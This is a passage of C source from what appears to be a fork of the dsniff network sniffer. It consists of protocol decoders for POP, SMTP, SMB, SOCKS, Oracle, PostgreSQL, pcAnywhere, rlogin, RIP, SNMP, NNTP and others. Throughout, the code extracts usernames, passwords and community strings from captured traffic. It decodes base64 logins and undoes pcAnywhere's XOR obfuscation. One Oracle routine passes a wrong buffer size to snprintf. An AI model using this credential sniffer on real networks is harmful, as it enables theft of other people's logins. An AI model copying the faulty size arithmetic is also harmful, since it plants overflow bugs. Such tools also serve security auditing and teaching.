| u_short i, type; 26 | 27 | buf_init(&inbuf, buf, len); 28 | buf_init(&outbuf, obuf, olen); 29 | 30 | if (buf_get(&inbuf, &i, sizeof(i)) != sizeof(i)) 31 | return (0); 32 | 33 | i = pletohs(&i); 34 | 35 | if (buf_get(&inbuf, &type, sizeof(type)) != sizeof(type)) 36 | return (0); 37 | 38 | type = pletohs(&type); 39 | 40 | if (type != 2 || i > buf_len(&inbuf)) 41 | return (0); 42 | 43 | buf_put(&outbuf, buf_ptr(&inbuf), i); 44 | buf_put(&outbuf, "\n", 1); 45 | 46 | buf_end(&outbuf); 47 | 48 | return (buf_len(&outbuf)); 49 | } 50 | 51 | -------------------------------------------------------------------------------- /decode_nntp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_nntp.c 3 | * 4 | * Network News Transport Protocol. 5 | * 6 | * Copyright (c) 2000 Felix von Leitner 7 | * Copyright (c) 2000 Dug Song 8 | * 9 | * $Id: decode_nntp.c,v 1.5 2001/03/15 08:33:01 dugsong Exp $ 10 | */ 11 | 12 | #include "config.h" 13 | 14 | #include 15 | 16 | #include 17 | #include 18 | #include 19 | 20 | #include "base64.h" 21 | #include "decode.h" 22 | 23 | int 24 | decode_nntp(u_char *buf, int len, u_char *obuf, int olen) 25 | { 26 | char *p; 27 | int i, simple, dpa; 28 | 29 | obuf[0] = '\0'; 30 | simple = dpa = 0; 31 | 32 | for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { 33 | if (simple == 1) { 34 | strlcat(obuf, p, olen); 35 | strlcat(obuf, "\n", olen); 36 | simple = 0; 37 | } 38 | else if (strncasecmp(p, "AUTHINFO ", 9) == 0) { 39 | strlcat(obuf, p, olen); 40 | 41 | if (strncasecmp(p + 9, "SIMPLE", 6) == 0) { 42 | simple = 1; 43 | } 44 | else if (strncasecmp(p + 9, "GENERIC ", 8) == 0) { 45 | if (strncasecmp(p + 17, "DPA", 3) == 0) { 46 | dpa = 1; 47 | } 48 | else if (dpa == 1) { 49 | p += 17; 50 | i = base64_pton(p, p, strlen(p)); 51 | p[i] = '\0'; 52 | i = strlen(obuf); 53 | snprintf(obuf + i, olen - i, 54 | " [%s]", p); 55 | } 56 | } 57 | strlcat(obuf, "\n", olen); 58 | } 59 | } 60 | return (strlen(obuf)); 61 | } 62 | 63 | -------------------------------------------------------------------------------- /decode_oracle.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_oracle.c 3 | * 4 | * Oracle SQL*Net v2/Net8. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_oracle.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "decode.h" 19 | 20 | /* XXX - dag nasty. anyone have protocol specs? */ 21 | int 22 | decode_oracle(u_char *buf, int len, u_char *obuf, int olen) 23 | { 24 | u_char *p, *q; 25 | u_short i, j; 26 | int gotauth = 0; 27 | 28 | p = buf; 29 | 30 | i = pntohs(p); 31 | if (i >= len) return (0); 32 | 33 | if (i < 60) { /* XXX - skip unknown "empty" packet */ 34 | p += i; 35 | i = pntohs(p); 36 | if (p + i > buf + len) return (0); 37 | } 38 | /* Save TNS connect string. */ 39 | p[i] = '\0'; 40 | for (q = p + i; q > p && q[-1] != '\0'; q--) 41 | ; 42 | snprintf(obuf, olen, "%s\n", q); 43 | p += i; 44 | 45 | /* XXX - skip initial username message. */ 46 | if ((p = bufbuf(p, len, "(TNS V", 6)) == NULL) return (0); 47 | if ((i = len - (p - buf)) <= 0) return (0); 48 | if ((p = memchr(p, ')', i)) == NULL) return (0); 49 | 50 | /* Parse auth messages. */ 51 | for (p++; p - buf < len; p += i) { 52 | i = pntohs(p); 53 | if (p + i > buf + len || i < 120) 54 | break; 55 | 56 | if (memcmp(p + 4, "\x06\x00\x00\x00\x00\x00\x03\x3a", 8) != 0) 57 | continue; 58 | 59 | for (q = p + i; q > p && q[-1] != '\0'; q--) 60 | ; 61 | j = pntohs(p + 19); 62 | if (q + j > buf + len) 63 | return (0); 64 | q[j] = '\0'; 65 | 66 | j = strlen(obuf); 67 | snprintf(obuf + j, olen + j, "%s\n", p + 117); 68 | gotauth++; 69 | } 70 | return (gotauth ? strlen(obuf) : 0); 71 | } 72 | -------------------------------------------------------------------------------- /decode_ospf.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_ospf.c 3 | * 4 | * Open Shortest Path First. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_ospf.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "decode.h" 19 | 20 | int 21 | decode_ospf(u_char *buf, int len, u_char *obuf, int olen) 22 | { 23 | if (len < 25) 24 | return (0); 25 | 26 | if (pntohs(buf + 14) != 1) 27 | return (0); 28 | 29 | buf[24] = '\0'; 30 | 31 | return (snprintf(obuf, olen, "%s\n", buf + 16)); 32 | } 33 | 34 | -------------------------------------------------------------------------------- /decode_pcanywhere.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_pcanywhere.c 3 | * 4 | * Symantec pcAnywhere. 5 | * 6 | * Thanks to Pascal Longpre for his BUGTRAQ post 7 | * on pcAnywhere encryption, and for providing me with traffic traces. 8 | * 9 | * Copyright (c) 2000 Dug Song 10 | * 11 | * $Id: decode_pcanywhere.c,v 1.7 2001/03/15 08:33:01 dugsong Exp $ 12 | */ 13 | 14 | #include "config.h" 15 | 16 | #include 17 | 18 | #include 19 | #include 20 | 21 | #include "buf.h" 22 | #include "decode.h" 23 | 24 | int 25 | decode_pcanywhere(u_char *buf, int len, u_char *obuf, int olen) 26 | { 27 | struct buf *word, inbuf, outbuf; 28 | u_char *p, c; 29 | int i; 30 | 31 | buf_init(&inbuf, buf, len); 32 | buf_init(&outbuf, obuf, olen); 33 | 34 | /* Skip leading zero bytes. */ 35 | while (buf_get(&inbuf, &c, 1) == 1) { 36 | if (c != 0) break; 37 | } 38 | /* Version 7, no encryption */ 39 | if (c < 0x0f && c != 0x06 /* jic */) { 40 | while ((word = buf_tok(&inbuf, "\r", 1)) != NULL) { 41 | if (buf_ptr(word)[0] == 0x6f) 42 | break; 43 | buf_putf(&outbuf, "%.*s\n", 44 | buf_len(word), buf_ptr(word)); 45 | } 46 | } 47 | /* Version 9, encrypted */ 48 | else { 49 | /* Skip optional \x6f command packets. */ 50 | while ((i = buf_index(&inbuf, "\x06", 1)) >= 0) { 51 | buf_skip(&inbuf, i); 52 | if (buf_len(&inbuf) > 2 && buf_ptr(&inbuf)[1] != 0xff) 53 | break; 54 | buf_skip(&inbuf, 2); 55 | } 56 | /* Parse \x06 auth packets. */ 57 | while (buf_cmp(&inbuf, "\x06", 1) == 0) { 58 | buf_skip(&inbuf, 1); 59 | 60 | if (buf_get(&inbuf, &c, 1) != 1) 61 | break; 62 | 63 | if (buf_len(&inbuf) < c) 64 | break; 65 | 66 | p = buf_ptr(&inbuf); 67 | buf_skip(&inbuf, c); 68 | 69 | for (i = c - 1; i > 0; i--) { 70 | p[i] = p[i - 1] ^ p[i] ^ (i - 1); 71 | } 72 | p[0] ^= 0xab; 73 | 74 | buf_putf(&outbuf, "%.*s\n", c, p); 75 | } 76 | } 77 | buf_end(&outbuf); 78 | 79 | return (buf_len(&outbuf)); 80 | } 81 | 82 | -------------------------------------------------------------------------------- /decode_pop.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_pop.c 3 | * 4 | * Post Office Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_pop.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ 9 | * 10 | * Rewritten by Stefan Tomanek 2011 11 | */ 12 | 13 | #include "config.h" 14 | 15 | #include 16 | 17 | #include 18 | #include 19 | #include 20 | 21 | #include "base64.h" 22 | #include "options.h" 23 | #include "decode.h" 24 | 25 | extern struct _dc_meta dc_meta; 26 | 27 | int 28 | decode_poppass(u_char *buf, int len, u_char *obuf, int olen) 29 | { 30 | char *p; 31 | 32 | obuf[0] = '\0'; 33 | 34 | for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { 35 | if (strncasecmp(p, "user ", 5) == 0 || 36 | strncasecmp(p, "pass ", 5) == 0 || 37 | strncasecmp(p, "newpass ", 8) == 0) { 38 | strlcat(obuf, p, olen); 39 | strlcat(obuf, "\n", olen); 40 | } 41 | } 42 | if (strip_lines(obuf, Opt_lines) < 3) 43 | return (0); 44 | 45 | return (strlen(obuf)); 46 | } 47 | 48 | int 49 | decode_pop(u_char *buf, int len, u_char *obuf, int olen) 50 | { 51 | char *p; 52 | char *s; 53 | int n; 54 | int i, j; 55 | char *user; 56 | char *password; 57 | enum { 58 | NONE, 59 | AUTHPLAIN, 60 | AUTHLOGIN, 61 | USERPASS 62 | } mode = NONE; 63 | 64 | 65 | obuf[0] = '\0'; 66 | 67 | for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { 68 | if (mode == NONE) { 69 | user = NULL; 70 | password = NULL; 71 | if (strncasecmp(p, "AUTH PLAIN", 10) == 0) { 72 | mode = AUTHPLAIN; 73 | continue; 74 | } 75 | if (strncasecmp(p, "AUTH LOGIN", 10) == 0) { 76 | mode = AUTHLOGIN; 77 | continue; 78 | } 79 | if (strncasecmp(p, "USER ", 5) == 0) { 80 | mode = USERPASS; 81 | /* the traditional login cuts right to the case, 82 | * so no continue here 83 | */ 84 | } 85 | } 86 | if (mode == USERPASS) { 87 | if (strncasecmp(p, "USER ", 5) == 0) { 88 | user = &p[5]; 89 | } else if (strncasecmp(p, "PASS ", 5) == 0) { 90 | password = &p[5]; 91 | } 92 | } 93 | 94 | if (mode == AUTHPLAIN) { 95 | decode_authplain(p, &user, &password); 96 | } 97 | 98 | if (mode == AUTHLOGIN) { 99 | j = base64_pton(p, p, strlen(p)); 100 | p[j] = '\0'; 101 | if (!user) { 102 | user = p; 103 | } else { 104 | password = p; 105 | /* got everything we need :-) */ 106 | } 107 | } 108 | 109 | if (user && password) { 110 | strlcat(obuf, "username [", olen); 111 | strlcat(obuf, user, olen); 112 | strlcat(obuf, "] password [", olen); 113 | strlcat(obuf, password, olen); 114 | strlcat(obuf, "]\n", olen); 115 | dc_meta.is_hot = 1; 116 | 117 | mode = NONE; 118 | } 119 | } 120 | return (strlen(obuf)); 121 | } 122 | 123 | -------------------------------------------------------------------------------- /decode_portmap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_portmap.c 3 | * 4 | * RPC portmap. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_portmap.c,v 1.8 2001/03/15 08:33:02 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | #include 15 | #include 16 | 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #include "rpc.h" 23 | #include "trigger.h" 24 | #include "decode.h" 25 | 26 | int 27 | decode_portmap(u_char *buf, int len, u_char *obuf, int olen) 28 | { 29 | XDR xdrs; 30 | struct rpc_msg msg; 31 | struct pmap *pm, pmap; 32 | struct xid_map *xm; 33 | int hdrlen; 34 | 35 | if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) 36 | return (0); 37 | 38 | if (msg.rm_direction == CALL && 39 | msg.rm_call.cb_prog == PMAPPROG && 40 | msg.rm_call.cb_proc == PMAPPROC_GETPORT) { 41 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); 42 | if (xdr_pmap(&xdrs, &pmap)) { 43 | if ((pm = malloc(sizeof(*pm))) != NULL) { 44 | *pm = pmap; 45 | xid_map_enter(msg.rm_xid, PMAPPROG, PMAPVERS, 46 | PMAPPROC_GETPORT, (void *) pm); 47 | } 48 | } 49 | xdr_destroy(&xdrs); 50 | } 51 | else if (msg.rm_direction == REPLY && 52 | (xm = xid_map_find(msg.rm_xid)) != NULL) { 53 | if (msg.rm_reply.rp_stat == MSG_ACCEPTED && 54 | msg.acpted_rply.ar_stat == SUCCESS) { 55 | pm = (struct pmap *)xm->data; 56 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, 57 | XDR_DECODE); 58 | if (xdr_u_long(&xdrs, &pm->pm_port)) { 59 | trigger_rpc(pm->pm_prog, pm->pm_prot, 60 | pm->pm_port); 61 | trigger_rpc(pm->pm_prog, pm->pm_prot, 62 | 0 - (int) pm->pm_port); 63 | } 64 | xdr_destroy(&xdrs); 65 | } 66 | free(xm->data); 67 | memset(xm, 0, sizeof(*xm)); 68 | } 69 | return (0); 70 | } 71 | -------------------------------------------------------------------------------- /decode_postgresql.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_postgresql.c 3 | * 4 | * PostgreSQL. 5 | * 6 | * Thanks to Eric Jackson for packet traces. 7 | * 8 | * Copyright (c) 2000 Dug Song 9 | * 10 | * $Id: decode_postgresql.c,v 1.6 2001/03/15 08:33:02 dugsong Exp $ 11 | */ 12 | 13 | #include "config.h" 14 | 15 | #include 16 | 17 | #include 18 | #include 19 | 20 | #include "decode.h" 21 | 22 | #define STARTUP_PKTLEN 296 23 | 24 | int 25 | decode_postgresql(u_char *buf, int len, u_char *obuf, int olen) 26 | { 27 | u_int32_t plen; 28 | u_char *p; 29 | char *db, *user; 30 | 31 | if (len < STARTUP_PKTLEN) 32 | return (0); 33 | 34 | obuf[0] = '\0'; 35 | db = user = NULL; 36 | 37 | for (;;) { 38 | if (len < 4) break; 39 | plen = pntohl(buf); 40 | 41 | if (plen > len) break; 42 | p = buf + 4; 43 | 44 | if (plen == STARTUP_PKTLEN) { 45 | if (pntohl(p) >> 16 == 2) { 46 | db = p + 4; db[63] = '\0'; 47 | user = db + 64; user[31] = '\0'; 48 | } 49 | } 50 | else if (db != NULL && user != NULL) { 51 | buf[plen - 1] = '\0'; 52 | snprintf(obuf + strlen(obuf), 53 | olen - strlen(obuf), 54 | "%s\n%s\n%s\n", db, user, p); 55 | db = user = NULL; 56 | } 57 | buf += plen; 58 | len -= plen; 59 | } 60 | return (strlen(obuf)); 61 | } 62 | 63 | -------------------------------------------------------------------------------- /decode_rip.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_rip.c 3 | * 4 | * Routing Information Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_rip.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "decode.h" 19 | 20 | int 21 | decode_rip(u_char *buf, int len, u_char *obuf, int olen) 22 | { 23 | if (len < 21) 24 | return (0); 25 | 26 | /* Version 2 simple password authentication. */ 27 | if (buf[1] != 2 || memcmp(buf + 4, "\xff\xff\x00\x02", 4) != 0) 28 | return (0); 29 | 30 | buf[20] = '\0'; 31 | 32 | return (snprintf(obuf, olen, "%s\n", buf + 20)); 33 | } 34 | 35 | -------------------------------------------------------------------------------- /decode_rlogin.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_rlogin.c 3 | * 4 | * Berkeley remote login/shell/exec. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_rlogin.c,v 1.6 2001/03/15 08:33:02 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | #include "options.h" 21 | #include "decode.h" 22 | 23 | int 24 | decode_rlogin(u_char *buf, int len, u_char *obuf, int olen) 25 | { 26 | u_char *p, *q; 27 | 28 | /* Skip first NULL, or rexec stderr port */ 29 | for (p = buf; p - buf < len && *p == '\0'; p++) 30 | ; /* VOID */ 31 | 32 | strlcpy(obuf, "[", olen); 33 | strlcat(obuf, p, olen); /* Local username */ 34 | strlcat(obuf, ":", olen); 35 | p += strlen(p) + 1; 36 | 37 | strlcat(obuf, p, olen); /* Remote username */ 38 | strlcat(obuf, "]\n", olen); 39 | p += strlen(p) + 1; 40 | 41 | p += strlen(p) + 1; /* Skip term info */ 42 | 43 | if ((q = strstr(p, "\xff\xffss")) != NULL) /* Skip window size */ 44 | p += 12; 45 | 46 | for (p = strtok(p, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { 47 | strlcat(obuf, p, olen); 48 | strlcat(obuf, "\n", olen); 49 | } 50 | if (!strip_lines(obuf, Opt_lines)) 51 | return (0); 52 | 53 | return (strlen(obuf)); 54 | } 55 | 56 | -------------------------------------------------------------------------------- /decode_smb.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_smb.c 3 | * 4 | * Microsoft Server Message Block. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_smb.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | #include 15 | 16 | #include 17 | #include 18 | #include 19 | 20 | #include "decode.h" 21 | 22 | struct smbhdr { 23 | u_char proto[4]; 24 | u_char cmd; 25 | u_char err[4]; 26 | u_char flags1; 27 | u_short flags2; 28 | u_short pad[6]; 29 | u_short tid, pid, uid, mid; 30 | }; 31 | 32 | int 33 | decode_smb(u_char *buf, int len, u_char *obuf, int olen) 34 | { 35 | struct smbhdr *smb; 36 | int i, j, k; 37 | u_char *p, *q, *end; 38 | char *user, *pass; 39 | 40 | obuf[0] = '\0'; 41 | 42 | /* Skip NetBIOS session request. */ 43 | if (len < 4 || buf[0] != 0x81) return (0); 44 | buf += 2; 45 | GETSHORT(i, buf); len -= 4; 46 | if (len < i) return (0); 47 | buf += i; len -= i; 48 | end = buf + len; 49 | 50 | /* Parse SMBs. */ 51 | for (p = buf; p < end; p += i) { 52 | GETLONG(i, p); 53 | if (i > end - p || i < sizeof(*smb) + 32) 54 | continue; 55 | 56 | smb = (struct smbhdr *)p; 57 | if (memcmp(smb->proto, "\xffSMB", 4) != 0 || smb->cmd != 0x73) 58 | continue; 59 | 60 | user = pass = NULL; 61 | q = (u_char *)(smb + 1); 62 | 63 | if (*q == 10) { /* Pre NT LM 0.12 */ 64 | q += 15; j = pletohs(q); q += 2; 65 | if (j > i - (sizeof(*smb) + 15 + 6)) 66 | continue; 67 | pass = q + 6; 68 | user = pass + j; 69 | } 70 | else if (*q == 13) { /* NT LM 0.12 */ 71 | q += 15; j = pletohs(q); 72 | q += 2; k = pletohs(q); 73 | if (j > i - ((q - p) + 12) || k > i - ((q - p) + 11)) 74 | continue; 75 | pass = q + 12; 76 | user = pass + j + k; 77 | } 78 | else continue; 79 | 80 | /* XXX - skip null IPC sessions, etc. */ 81 | if (user && pass && strlen(user) && 82 | is_ascii_string(pass, j - 1)) { 83 | strlcat(obuf, user, olen); 84 | strlcat(obuf, " ", olen); 85 | strlcat(obuf, pass, olen); 86 | strlcat(obuf, "\n", olen); 87 | } 88 | } 89 | return (strlen(obuf)); 90 | } 91 | 92 | -------------------------------------------------------------------------------- /decode_smtp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_smtp.c 3 | * 4 | * Simple Mail Transfer Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_smtp.c,v 1.3 2001/03/15 08:33:02 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | #include 18 | 19 | #include "base64.h" 20 | #include "options.h" 21 | #include "decode.h" 22 | 23 | extern struct _dc_meta dc_meta; 24 | 25 | int 26 | decode_smtp(u_char *buf, int len, u_char *obuf, int olen) 27 | { 28 | char *p, *s; 29 | int i, j, login = 0; 30 | int found = 0; 31 | 32 | obuf[0] = '\0'; 33 | for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { 34 | if ((strncmp(p, "MAIL ", 5) == 0) || (strncmp(p, "RCPT ", 5) == 0)) { 35 | if (!Opt_verbose) 36 | break; 37 | if (obuf[0] != '\0') 38 | strlcat(obuf, "\n", olen); 39 | strlcat(obuf, p+5, olen); 40 | if (++found >= 2) 41 | break; 42 | continue; 43 | } 44 | if ((strncmp(p, "DATA", 4) == 0) || (strncmp(p, "QUIT", 4) == 0)) 45 | break; 46 | 47 | if (login == 0) { 48 | if (strncmp(p, "AUTH LOGIN", 10) != 0) 49 | continue; 50 | 51 | strlcat(obuf, p, olen); 52 | p += 10; 53 | i = base64_pton(p, p, strlen(p)); 54 | if (i > 0) { 55 | p[i] = '\0'; 56 | j = strlen(obuf); 57 | snprintf(obuf + j, olen - j, " [%s]", p); 58 | } else { 59 | strlcat(obuf, " ", olen); 60 | login = 1; 61 | } 62 | dc_meta.is_hot = 1; 63 | continue; 64 | } 65 | 66 | strlcat(obuf, p, olen); 67 | // USER: 68 | // PASS: 69 | // 70 | if ((s = strchr(p, ' ')) != NULL) 71 | p = ++s; 72 | i = base64_pton(p, p, strlen(p)); 73 | if (i > 0) { 74 | p[i] = '\0'; 75 | j = strlen(obuf); 76 | snprintf(obuf + j, olen - j, " [%s] ", p); 77 | } 78 | } 79 | return (strlen(obuf)); 80 | } 81 | -------------------------------------------------------------------------------- /decode_sni.c: -------------------------------------------------------------------------------- 1 | #include "config.h" 2 | 3 | #include 4 | #include 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #include "options.h" 14 | #include "decode.h" 15 | 16 | extern struct _dc_meta dc_meta; 17 | 18 | struct tls_hdr { 19 | uint8_t proto; 20 | uint16_t vers; 21 | uint16_t len; 22 | } __attribute__((packed)); 23 | 24 | struct tls_ch { 25 | uint8_t type; 26 | uint8_t len[3]; 27 | uint16_t version; /// 03 03 for TLS 1.2 and TLS 1.3 28 | uint8_t random[32]; 29 | uint8_t sid_len; 30 | } __attribute__((packed)); 31 | 32 | struct tls_ex { 33 | uint16_t type; 34 | uint16_t len; 35 | } __attribute__((packed)); 36 | 37 | int 38 | decode_sni(u_char *buf, int len, u_char *obuf, int olen) { 39 | u_char *end = buf + len; 40 | u_char *ptr = buf; 41 | struct tls_hdr *t = (struct tls_hdr *)buf; 42 | struct tls_ch *ch; 43 | uint16_t hls; 44 | uint16_t type; 45 | u_char *str; 46 | char dom[1024]; 47 | 48 | if (!Opt_verbose) 49 | return 0; 50 | 51 | if (len <= sizeof (struct tls_hdr) + sizeof (struct tls_ch) /* + sid_len */ + sizeof (struct tls_ex)) 52 | return 0; 53 | 54 | memcpy(&hls, &t->len, 2); 55 | hls = ntohs(hls); 56 | memset(&t->len, 0, 2); 57 | 58 | if (memcmp(buf, "\x16\x03\x01\x00\x00\x01", 6) != 0) 59 | return 0; 60 | 61 | // Skip TLS header 62 | ptr += sizeof *t; 63 | if (end - ptr < sizeof *ch) 64 | return 0; 65 | ch = (struct tls_ch *)ptr; 66 | // Skip fixed ClientHelo 67 | if (ptr[5] != 0x03) // ch->verison[1] 68 | return 0; 69 | ptr += sizeof *ch; 70 | ptr += ch->sid_len; // Skip Session-ID 71 | if (ptr >= end) 72 | return 0; 73 | 74 | memcpy(&hls, ptr, 2); 75 | hls = ntohs(hls); 76 | ptr += hls + 2; // Skip length + Cipher Suites 77 | if (ptr >= end) 78 | return 0; 79 | 80 | ptr += (ptr[0] + 1); // Skip length + Compression Methods 81 | 82 | if (ptr + 2 >= end) 83 | return 0; 84 | memcpy(&hls, ptr, 2); 85 | hls = ntohs(hls); 86 | ptr += 2; 87 | 88 | // Ignore garbage after extensions (should not be any) 89 | if (ptr + hls < end) 90 | end = ptr + hls; 91 | // Iterate through all TLS extensions until we find SNI. 92 | while (1) { 93 | if (ptr + sizeof (struct tls_ex) + 2 /* SNI List Length */ + 1 /* SNI Type */ >= end) 94 | goto err; 95 | 96 | memcpy(&type, ptr, 2); 97 | type = htons(type); 98 | if (type != 0) { 99 | memcpy(&hls, ptr + 2, 2); 100 | hls = htons(hls); 101 | ptr += sizeof (struct tls_ex) + hls; 102 | continue; 103 | } 104 | // SNI 105 | ptr += sizeof (struct tls_ex); 106 | 107 | ptr += 2; // List Length. 108 | if (ptr >= end) 109 | goto err; 110 | if (*ptr != 0x00) 111 | goto err; 112 | ptr += 1; // SN Type. 113 | if (ptr + 2 >= end) 114 | goto err; 115 | memcpy(&hls, ptr, 2); 116 | hls = htons(hls); 117 | ptr += 2; // SN Length 118 | 119 | if (ptr + hls + 1 >= end) // SNI is never the last. Make sure there is \0 for the \0. 120 | goto err; 121 | 122 | str = ascii_string(ptr, hls + 1); 123 | if (Opt_color) { 124 | snprintf(obuf, olen, CDY"SNI"CN": %s", color_domain(dom, sizeof dom, str)); 125 | } else 126 | snprintf(obuf, olen, "SNI: %s", str); 127 | 128 | break; 129 | } 130 | 131 | return (strlen(obuf)); 132 | err: 133 | if (Opt_debug) 134 | warnx("TLS 1.2/1.3 without SNI"); 135 | return 0; 136 | } 137 | 138 | -------------------------------------------------------------------------------- /decode_sniffer.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_sniffer.c 3 | * 4 | * Network Associates Sniffer. 5 | * 6 | * Copyright (c) 2000 Anonymous 7 | * Copyright (c) 2000 Dug Song 8 | * 9 | * $Id: decode_sniffer.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ 10 | */ 11 | 12 | #include "config.h" 13 | 14 | #include 15 | 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include "base64.h" 22 | #include "decode.h" 23 | 24 | int 25 | decode_sniffer(u_char *buf, int len, u_char *obuf, int olen) 26 | { 27 | u_int i, opcode; 28 | 29 | if (len < 36 || buf[0] != 5) 30 | return (0); 31 | 32 | opcode = pletohs(&buf[6]); 33 | 34 | if (opcode == 260) { 35 | if (buf[32] == 0) 36 | return (strlcpy(obuf, "[]\n", olen)); 37 | } 38 | else if (opcode == 261) { 39 | if (pletohl(&buf[32]) == -1) 40 | return (strlcpy(obuf, "[]\n", olen)); 41 | } 42 | else return (0); 43 | 44 | buf[len - 3]= '\0'; strtok(&buf[32], "\r\n"); 45 | snprintf(obuf, olen, "%s [", &buf[32]); 46 | len = strlen(obuf); 47 | i = base64_pton(&buf[32], &obuf[len], olen - len - 3); 48 | obuf[len + i] = '\0'; 49 | strlcat(obuf, "]\n", olen); 50 | 51 | return (strlen(obuf)); 52 | } 53 | 54 | -------------------------------------------------------------------------------- /decode_snmp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_snmp.c 3 | * 4 | * Simple Network Management Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_snmp.c,v 1.6 2001/03/15 08:33:02 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | #include 18 | 19 | #include "buf.h" 20 | #include "asn1.h" 21 | #include "decode.h" 22 | 23 | int 24 | decode_snmp(u_char *buf, int len, u_char *obuf, int olen) 25 | { 26 | struct buf *b, inbuf, outbuf; 27 | u_char *p, vers; 28 | int i; 29 | 30 | buf_init(&inbuf, buf, len); 31 | buf_init(&outbuf, obuf, olen); 32 | 33 | if (asn1_type(&inbuf) != ASN1_SEQUENCE) 34 | return (0); 35 | asn1_len(&inbuf); /* XXX - skip sequence length */ 36 | 37 | if (asn1_type(&inbuf) != ASN1_INTEGER) 38 | return (0); 39 | if (asn1_len(&inbuf) != 1) /* XXX - check version length */ 40 | return (0); 41 | buf_get(&inbuf, &vers, sizeof(vers)); 42 | 43 | if (asn1_type(&inbuf) != ASN1_STRING) 44 | return (0); 45 | i = asn1_len(&inbuf); 46 | b = buf_tok(&inbuf, NULL, i); 47 | p = buf_strdup(b); 48 | 49 | buf_putf(&outbuf, "[version %d]\n%s\n", vers + 1, p); 50 | free(p); 51 | buf_end(&outbuf); 52 | 53 | return (buf_len(&outbuf)); 54 | } 55 | 56 | -------------------------------------------------------------------------------- /decode_socks.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_socks.c 3 | * 4 | * NEC SOCKS. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_socks.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | #include 18 | 19 | #include "decode.h" 20 | 21 | int 22 | decode_socks(u_char *buf, int len, u_char *obuf, int olen) 23 | { 24 | u_char *p; 25 | int i, n; 26 | 27 | p = buf; 28 | 29 | if (len < 4 || *p++ != 5) /* SOCKS version */ 30 | return (0); 31 | 32 | if ((n = *p++) > len - 5) /* nmethods */ 33 | return (0); 34 | 35 | for (i = 0; i < n; i++) /* USERNAME/PASSWORD method? */ 36 | if (p[i] == 2) break; 37 | 38 | if (i == n) return (0); 39 | 40 | p += n; 41 | if (*p++ != 1) return (0); /* USERNAME/PASSWORD version */ 42 | 43 | n = *p++; 44 | if (n > len - (p - buf)) 45 | return (0); 46 | 47 | memmove(p - 1, p, n); p[n - 1] = '\0'; 48 | snprintf(obuf, olen, "%s ", p - 1); 49 | p += n; 50 | 51 | n = *p++; 52 | if (n > len - (p - buf)) 53 | return (0); 54 | 55 | memmove(p - 1, p, n); p[n - 1] = '\0'; 56 | strlcat(obuf, p - 1, olen); 57 | strlcat(obuf, "\n", olen); 58 | 59 | return (strlen(obuf)); 60 | } 61 | 62 | -------------------------------------------------------------------------------- /decode_ssh.c: -------------------------------------------------------------------------------- 1 | #include "config.h" 2 | 3 | #include 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | #include 10 | #include 11 | 12 | #include "options.h" 13 | #include "decode.h" 14 | 15 | extern struct _dc_meta dc_meta; 16 | 17 | int 18 | 